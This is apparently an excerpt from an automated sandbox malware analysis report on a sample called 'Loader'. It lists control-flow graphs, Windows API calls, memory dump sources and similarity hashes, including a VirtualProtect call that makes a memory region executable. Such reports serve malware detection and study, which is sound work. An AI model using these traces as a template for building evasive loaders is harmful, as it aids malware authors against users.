                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 3956949563-0
                                                                                                  • Opcode ID: 758c6e7597fbeb9957834de4254a19db75fdc814f3959520d2cb21d58a4a22bd
                                                                                                  • Instruction ID: 29c4f45dba6ae7a393e4c049b3eb0e53760638dce8611630b34c9950a54ab5d2
                                                                                                  • Opcode Fuzzy Hash: 758c6e7597fbeb9957834de4254a19db75fdc814f3959520d2cb21d58a4a22bd
                                                                                                  • Instruction Fuzzy Hash: 4D21A6F2D402159BDF10EFE4DD06BDEBBB8AF04710F080125F508BA291E7B6A554CBA2

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 51 a7cf0b-a7cf17 52 a7cfa9-a7cfac 51->52 53 a7cfb2 52->53 54 a7cf1c-a7cf2d 52->54 55 a7cfb4-a7cfb8 53->55 56 a7cf2f-a7cf32 54->56 57 a7cf3a-a7cf53 LoadLibraryExW 54->57 60 a7cfd2-a7cfd4 56->60 61 a7cf38 56->61 58 a7cf55-a7cf5e GetLastError 57->58 59 a7cfb9-a7cfc9 57->59 62 a7cf97-a7cfa4 58->62 63 a7cf60-a7cf72 call a80554 58->63 59->60 64 a7cfcb-a7cfcc FreeLibrary 59->64 60->55 65 a7cfa6 61->65 62->65 63->62 68 a7cf74-a7cf86 call a80554 63->68 64->60 65->52 68->62 71 a7cf88-a7cf95 LoadLibraryExW 68->71 71->59 71->62
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,A877E463,?,00A7D01A,?,?,00000000), ref: 00A7CFCC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                  • API String ID: 3664257935-537541572
                                                                                                  • Opcode ID: 53f9f9bcd6beefac87cea917f67799473b82397b6e24dba9fc1eaecf5712e1f0
                                                                                                  • Instruction ID: a035bb5aa3fb1a46ed4adbaf03e2693470cd42fc26d412159a623982b854405f
                                                                                                  • Opcode Fuzzy Hash: 53f9f9bcd6beefac87cea917f67799473b82397b6e24dba9fc1eaecf5712e1f0
                                                                                                  • Instruction Fuzzy Hash: 22210A32B01311ABCB21DBA5DC41A5A776AEF417B0F25C11AF91EE7290DB30ED01C6D0

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 127 a61750-a617eb call a79c30 130 a61806-a6180b 127->130 131 a617ed-a61803 127->131 132 a6180d-a61816 130->132 133 a6181b-a61821 130->133 131->130 135 a61b69-a61b8c 132->135 136 a61823-a61825 133->136 137 a61851-a61855 133->137 138 a61be4-a61c48 call a62f00 call a632c0 call a7060c 135->138 139 a61b8e-a61b95 call a6d748 135->139 136->137 140 a61827-a61849 call a62c50 136->140 141 a61858-a61898 call a64460 137->141 138->135 151 a61b97-a61b9a call a638e0 139->151 152 a61b9f-a61bad 139->152 140->135 153 a6184f 140->153 164 a618ca-a618e0 141->164 165 a6189a-a618b4 141->165 151->152 157 a61bd1-a61be3 152->157 158 a61baf-a61bce 152->158 153->141 158->157 166 a618e6-a618f5 164->166 167 a619b9 164->167 165->164 183 a618b6-a618c6 165->183 169 a619bb-a619c1 166->169 170 a618fb 166->170 167->169 172 a619ff-a61a03 169->172 173 a61900-a61914 170->173 176 a61a92-a61a96 172->176 177 a61a09-a61a11 172->177 174 a61916-a6191d 173->174 175 a61940-a61965 173->175 174->175 181 a6191f-a6192f 174->181 185 a61968-a61972 175->185 179 a61b54-a61b61 176->179 180 a61a9c-a61aa6 176->180 177->176 182 a61a13-a61a59 177->182 179->135 180->179 184 a61aac 180->184 181->185 202 a61a5b-a61a62 182->202 203 a61a68-a61a89 call a6def0 182->203 183->164 187 a61ab0-a61ac4 184->187 189 a61974-a61992 185->189 190 a619aa-a619b2 185->190 192 a61ac6-a61acd 187->192 193 a61af0-a61b1c 187->193 189->173 195 a61998-a619a8 189->195 196 a619b5-a619b7 190->196 192->193 197 a61acf-a61ae3 192->197 200 a61b1e-a61b47 193->200 204 a61b4f 193->204 195->196 196->169 199 a61ae5 197->199 197->200 199->204 200->187 206 a61b4d 200->206 202->203 205 a619d0-a619dd 202->205 210 a61a8b-a61a8d 203->210 204->179 207 a619e0-a619fc 205->207 206->179 207->172 210->207
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strlen
                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                  • API String ID: 4218353326-1866435925
                                                                                                  • Opcode ID: 4aa337fb7c33b3d3aa20ce6b803985259d88ade1946a1d2b7094f707832c9f65
                                                                                                  • Instruction ID: 8c038087d7adb4ec4a3fea0282ccd6b1d770f7b1da51c6f88de01de2fb25fd3a
                                                                                                  • Opcode Fuzzy Hash: 4aa337fb7c33b3d3aa20ce6b803985259d88ade1946a1d2b7094f707832c9f65
                                                                                                  • Instruction Fuzzy Hash: 4FF15E75A006148FCB14CFA8C494BADBBF1FF88324F198269E815AB3A1D774AD45CF90

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 212 a75349-a75354 213 a75356-a75369 call a776e4 call a77dcf 212->213 214 a7536a-a7537d call a753da 212->214 220 a7537f-a7539c CreateThread 214->220 221 a753ab 214->221 224 a7539e-a753aa GetLastError call a7770a 220->224 225 a753ba-a753bf 220->225 222 a753ad-a753b9 call a7542a 221->222 224->221 227 a753c6-a753ca 225->227 228 a753c1-a753c4 225->228 227->222 228->227
                                                                                                  APIs
                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00015470,00000000,00000000,00000000), ref: 00A75392
                                                                                                  • GetLastError.KERNEL32(?,?,?,00A62513,00000000,00000000), ref: 00A7539E
                                                                                                  • __dosmaperr.LIBCMT ref: 00A753A5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                                                                  • String ID:
                                                                                                  • API String ID: 2744730728-0
                                                                                                  • Opcode ID: 7f69508cf0e67249ab9d72a8dec54b522daf74c6ec276f385a60e354cb2b6b07
                                                                                                  • Instruction ID: db3556dcbc8f437d769c9adbf5597ab28ce7b36d2b2daee0b3f48565bd51dbbe
                                                                                                  • Opcode Fuzzy Hash: 7f69508cf0e67249ab9d72a8dec54b522daf74c6ec276f385a60e354cb2b6b07
                                                                                                  • Instruction Fuzzy Hash: 09014072905619ABDF159FB4DD25AAE3B65FF00391F10C058F80996160EFF0D951DB50

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 232 a754ee-a754fb call a7c2bb 235 a754fd-a75505 232->235 236 a7553b-a7553e ExitThread 232->236 235->236 237 a75507-a7550b 235->237 238 a75512-a75518 237->238 239 a7550d call a7ce1b 237->239 241 a75525-a7552b 238->241 242 a7551a-a7551c 238->242 239->238 241->236 244 a7552d-a7552f 241->244 242->241 243 a7551e-a7551f CloseHandle 242->243 243->241 244->236 245 a75531-a75535 FreeLibraryAndExitThread 244->245 245->236
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A7C2BB: GetLastError.KERNEL32(00000000,?,00A776E9,00A7D306,?,?,00A7C1B7,00000001,00000364,?,00000005,000000FF,?,00A75495,00A98E38,0000000C), ref: 00A7C2BF
                                                                                                    • Part of subcall function 00A7C2BB: SetLastError.KERNEL32(00000000), ref: 00A7C361
                                                                                                  • CloseHandle.KERNEL32(?,?,?,00A753D9,?,?,00A754CE,00000000), ref: 00A7551F
                                                                                                  • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00A753D9,?,?,00A754CE,00000000), ref: 00A75535
                                                                                                  • ExitThread.KERNEL32 ref: 00A7553E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 1991824761-0
                                                                                                  • Opcode ID: 545dcd50440803feeeffaaf553baa77214f2ed0dcbdd5303a2746b935597ba64
                                                                                                  • Instruction ID: e35bf36a58780b6ffa62a5f4df72ed1e585685b6f74391aa2cd27689b913df63
                                                                                                  • Opcode Fuzzy Hash: 545dcd50440803feeeffaaf553baa77214f2ed0dcbdd5303a2746b935597ba64
                                                                                                  • Instruction Fuzzy Hash: DAF0FEB1A00A016BCB255B75DC48A5A3AAEAF00374B18C614F86DC71A1DB61DD528790

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000002,?,00A75721,00A78396,00A78396,?,00000002,A877E463,00A78396,00000002), ref: 00A75670
                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00A75721,00A78396,00A78396,?,00000002,A877E463,00A78396,00000002), ref: 00A75677
                                                                                                  • ExitProcess.KERNEL32 ref: 00A75689
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1703294689-0
                                                                                                  • Opcode ID: 56640f7b66a4f9e895d233cb8f725bf15bf460f4e8d6faad79b0a047db342f7e
                                                                                                  • Instruction ID: 03caf76b14b42bda7362ba17638941da6d7807fe14c7fdbdd81c4b83fe7883c4
                                                                                                  • Opcode Fuzzy Hash: 56640f7b66a4f9e895d233cb8f725bf15bf460f4e8d6faad79b0a047db342f7e
                                                                                                  • Instruction Fuzzy Hash: 26D09E31500544BBCF016FB1DD0D8593F2BEF40381748C411B95949072DF729952DA44

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 353 a83bf4-a83c16 354 a83e09 353->354 355 a83c1c-a83c1e 353->355 358 a83e0b-a83e0f 354->358 356 a83c4a-a83c6d 355->356 357 a83c20-a83c3f call a77f78 355->357 360 a83c6f-a83c71 356->360 361 a83c73-a83c79 356->361 364 a83c42-a83c45 357->364 360->361 363 a83c7b-a83c8c 360->363 361->357 361->363 365 a83c8e-a83c9c call a829a2 363->365 366 a83c9f-a83caf call a83f21 363->366 364->358 365->366 371 a83cf8-a83d0a 366->371 372 a83cb1-a83cb7 366->372 375 a83d0c-a83d12 371->375 376 a83d61-a83d81 WriteFile 371->376 373 a83cb9-a83cbc 372->373 374 a83ce0-a83cf6 call a83f9e 372->374 377 a83cbe-a83cc1 373->377 378 a83cc7-a83cd6 call a84365 373->378 396 a83cd9-a83cdb 374->396 382 a83d4d-a83d5a call a843cd 375->382 383 a83d14-a83d17 375->383 380 a83d8c 376->380 381 a83d83-a83d89 GetLastError 376->381 377->378 386 a83da1-a83da4 377->386 378->396 390 a83d8f-a83d9a 380->390 381->380 395 a83d5f 382->395 384 a83d39-a83d4b call a84591 383->384 385 a83d19-a83d1c 383->385 403 a83d34-a83d37 384->403 391 a83da7-a83da9 385->391 392 a83d22-a83d2f call a844a8 385->392 386->391 397 a83d9c-a83d9f 390->397 398 a83e04-a83e07 390->398 399 a83dab-a83db0 391->399 400 a83dd7-a83de3 391->400 392->403 395->403 396->390 397->386 398->358 404 a83dc9-a83dd2 call a77770 399->404 405 a83db2-a83dc4 399->405 406 a83ded-a83dff 400->406 407 a83de5-a83deb 400->407 403->396 404->364 405->364 406->364 407->354 407->406
                                                                                                  APIs
                                                                                                    • Part of subcall function 00A83F9E: GetConsoleOutputCP.KERNEL32(A877E463,00000000,00000000,?), ref: 00A84001
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00A78584,?), ref: 00A83D79
                                                                                                  • GetLastError.KERNEL32(?,?,00A78584,?,00A787C8,00000000,?,00000000,00A787C8,?,?,?,00A98FE8,0000002C,00A786B4,?), ref: 00A83D83
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 2915228174-0
                                                                                                  • Opcode ID: 71dcff3fcee76d2adb3275e31a729223db50cfbb7521f555b0d8e7b768a800e8
                                                                                                  • Instruction ID: a70e5b0aa70e05f9406775ce6c398313a3740fd7a424dff40a398c0783b746e9
                                                                                                  • Opcode Fuzzy Hash: 71dcff3fcee76d2adb3275e31a729223db50cfbb7521f555b0d8e7b768a800e8
                                                                                                  • Instruction Fuzzy Hash: 0661B2B2D0411AAFDF11EFA8C984AEEBFB9BF49704F140545E800A7252D732DA15CBA0

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 410 a843cd-a84422 call a70050 413 a84424 410->413 414 a84497-a844a7 call a6a6e1 410->414 416 a8442a 413->416 418 a84430-a84432 416->418 419 a8444c-a84471 WriteFile 418->419 420 a84434-a84439 418->420 421 a8448f-a84495 GetLastError 419->421 422 a84473-a8447e 419->422 423 a8443b-a84441 420->423 424 a84442-a8444a 420->424 421->414 422->414 425 a84480-a8448b 422->425 423->424 424->418 424->419 425->416 426 a8448d 425->426 426->414
                                                                                                  APIs
                                                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00A83D5F,00000000,00A787C8,?,00000000,?,00000000), ref: 00A84469
                                                                                                  • GetLastError.KERNEL32(?,00A83D5F,00000000,00A787C8,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00A78584), ref: 00A8448F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 442123175-0
                                                                                                  • Opcode ID: 6b04c7c11535b779fd06647c298d41af8d8dd481c90e677469d4f08ab9a18705
                                                                                                  • Instruction ID: c406dda63469a435eeefa8af191cbeedf908cb70a5289d9e56755ebd375d1fad
                                                                                                  • Opcode Fuzzy Hash: 6b04c7c11535b779fd06647c298d41af8d8dd481c90e677469d4f08ab9a18705
                                                                                                  • Instruction Fuzzy Hash: 15217135A00219DBCB19DF6ADD80AE9B7B9FF4C305F2484AAE906D7211D630DD42CB64

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 427 a690f0-a69130 call a6efc1 430 a69136-a6913d 427->430 431 a691c7-a691c9 call a6b317 427->431 432 a69143-a69149 430->432 433 a691ce-a691df call a6b317 430->433 431->433 435 a69174-a6919a call a6efd2 call a692f0 432->435 436 a6914b-a69172 call a6efd2 432->436 442 a6919f-a691aa 433->442 435->442 445 a691b6-a691c6 436->445 442->445 446 a691b1 call a6a660 442->446 446->445
                                                                                                  APIs
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A691C9
                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00A691D7
                                                                                                    • Part of subcall function 00A6EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00A68E4A,00A6A2F0), ref: 00A6EFE7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 3666349979-0
                                                                                                  • Opcode ID: 921bb2ceffa45e3ed3fdecabf85b93bab02c6f0f857056fb00604de9b5edb289
                                                                                                  • Instruction ID: dfa8458c7a96f6f6c7ab05bb3621d3e21cec857e73fb11ed75b927dd56b297f9
                                                                                                  • Opcode Fuzzy Hash: 921bb2ceffa45e3ed3fdecabf85b93bab02c6f0f857056fb00604de9b5edb289
                                                                                                  • Instruction Fuzzy Hash: 5D21E5B1A00646DBDB10DF64CE45BAEBBB5FF05320F144229E5296B3C1D734A945CBD2

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 449 a7da52-a7da57 450 a7da59-a7da71 449->450 451 a7da73-a7da77 450->451 452 a7da7f-a7da88 450->452 451->452 453 a7da79-a7da7d 451->453 454 a7da9a 452->454 455 a7da8a-a7da8d 452->455 459 a7daf4-a7daf8 453->459 458 a7da9c-a7daa9 GetStdHandle 454->458 456 a7da96-a7da98 455->456 457 a7da8f-a7da94 455->457 456->458 457->458 460 a7dad6-a7dae8 458->460 461 a7daab-a7daad 458->461 459->450 462 a7dafe-a7db01 459->462 460->459 464 a7daea-a7daed 460->464 461->460 463 a7daaf-a7dab8 GetFileType 461->463 463->460 465 a7daba-a7dac3 463->465 464->459 466 a7dac5-a7dac9 465->466 467 a7dacb-a7dace 465->467 466->459 467->459 468 a7dad0-a7dad4 467->468 468->459
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00A7D941,00A99330,0000000C), ref: 00A7DA9E
                                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00A7D941,00A99330,0000000C), ref: 00A7DAB0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_a60000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileHandleType
                                                                                                  • String ID:
                                                                                                  • API String ID: 3000768030-0
                                                                                                  • Opcode ID: 6c098c866990a5883ebec36c6ed7c221e428ee53cf9c18428f57119d921e0717
                                                                                                  • Instruction ID: a9db6dc079bf3367094e9edef097d1dbe5e2a03fd3ff772df938b56b681bc661
                                                                                                  • Opcode Fuzzy Hash: 6c098c866990a5883ebec36c6ed7c221e428ee53cf9c18428f57119d921e0717
                                                                                                  • Instruction Fuzzy Hash: 9611B471208B524ACB308F3E8C886227BB5BF563B4B38C75AD0BE865F1C674D886D600

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 00A61240: _strlen.LIBCMT ref: 00A612BA
                                                                                                  • FreeConsole.KERNELBASE(?,?,?,?,?,00A6173F,?,?,?,00000000,?), ref: 00A61F21
                                                                                                  • VirtualProtect.KERNELBASE(00A9A011,00000549,00000040,?), ref: 00A61F78
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
